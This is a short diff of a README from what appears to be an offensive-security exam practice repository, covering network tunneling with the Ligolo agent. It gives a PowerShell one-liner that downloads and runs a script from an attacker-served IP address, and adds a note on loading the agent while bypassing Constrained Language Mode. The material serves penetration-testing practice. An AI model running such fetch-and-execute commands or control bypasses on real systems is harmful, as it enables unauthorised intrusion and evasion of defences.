Extravenger/OSEPlayground/04 - Tunneling/README.md

 - `iex(iwr http://192.168.45.173:443/ligolo.ps1 -UseBasicParsing)`

 *NOTE: make sure both ligolo.ps1 and agent.bin in the same directory, then serve them by simply using python server*.

+## CLM Bypass

+`ligolo-clmbypass.xml` can be used to load Ligolo agent with bypassing Constrained Language Mode.